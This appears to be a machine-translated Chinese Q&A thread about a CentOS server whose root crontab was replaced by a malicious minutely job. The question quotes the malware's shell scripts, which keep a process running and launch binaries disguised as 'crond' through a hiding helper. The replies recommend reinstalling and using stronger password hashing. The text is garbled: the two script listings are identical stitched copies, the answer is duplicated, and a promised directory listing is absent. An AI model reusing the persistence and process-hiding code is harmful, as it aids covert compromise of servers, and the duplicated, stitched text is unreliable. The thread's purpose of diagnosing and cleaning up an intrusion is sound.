centos:根用户'；s crontab被删除和替换-恶意代码？

我正在试图确定我的/var/spool/crontab/root是否被病毒或恶意代码覆盖：

我今天早上醒来，我的/var/spool/crontab/root文件是空的，除了这一行，它不是我写的：

* * * * * /usr/home/.bash_history/update > /dev/null 2>&1

我查找了这个设置为运行的更新文件，它包含以下内容：

#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null

#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi

该更新文件调用名为run的文件，其中包含：

#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null

#!/bin/bash

ARCH=`uname -m`
HIDE="crond"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./run64
fi

以下是/usr/home目录的全部内容，我不知道这些内容：

---

我正在运行centos6.8，我想你被黑客攻击了，可能是有人使用了可下载的rootkit。任何有调制解调器的白痴都可以使用它们，他们中的许多人甚至不知道一旦成功入侵系统该怎么办

您可以做的最安全的事情是从头开始重新安装操作系统，这次使用更强大的密码。（对不起，“pa$$w0rd”不要剪。）您可以尝试更改密码并在系统中搜索任何可疑的内容，但很有可能更改了一些您永远无法识别的内容

我曾经有一个系统被黑客攻击过，他们用替代品替换了“ls”、“ps”，谁知道还有哪些命令跳过了他们的干预，这使得我们很难100%确定我们已经找到并修复了他们的所有更改

重新安装后，查看如何将阴影哈希转换为使用SHA512。默认的哈希算法存储在/etc/login.defs中，可能是MD5，目前还不够强大。但即使使用更强的散列，许多弱密码也会很快落入暴力攻击

---

当你使用CentOS 6.9时，你可能会得到它，它将包括更多的安全补丁。

我想你已经被黑客攻击了，可能是有人使用可下载的rootkit。任何有调制解调器的白痴都可以使用它们，他们中的许多人甚至不知道一旦成功入侵系统该怎么办

您可以做的最安全的事情是从头开始重新安装操作系统，这次使用更强大的密码。（对不起，“pa$$w0rd”不要剪。）您可以尝试更改密码并在系统中搜索任何可疑的内容，但很有可能更改了一些您永远无法识别的内容

我曾经有一个系统被黑客攻击过，他们用替代品替换了“ls”、“ps”，谁知道还有哪些命令跳过了他们的干预，这使得我们很难100%确定我们已经找到并修复了他们的所有更改

重新安装后，查看如何将阴影哈希转换为使用SHA512。默认的哈希算法存储在/etc/login.defs中，可能是MD5，目前还不够强大。但即使使用更强的散列，许多弱密码也会很快落入暴力攻击

当你使用它的时候，你可能会得到CentOS 6.9，它将包括更多的安全补丁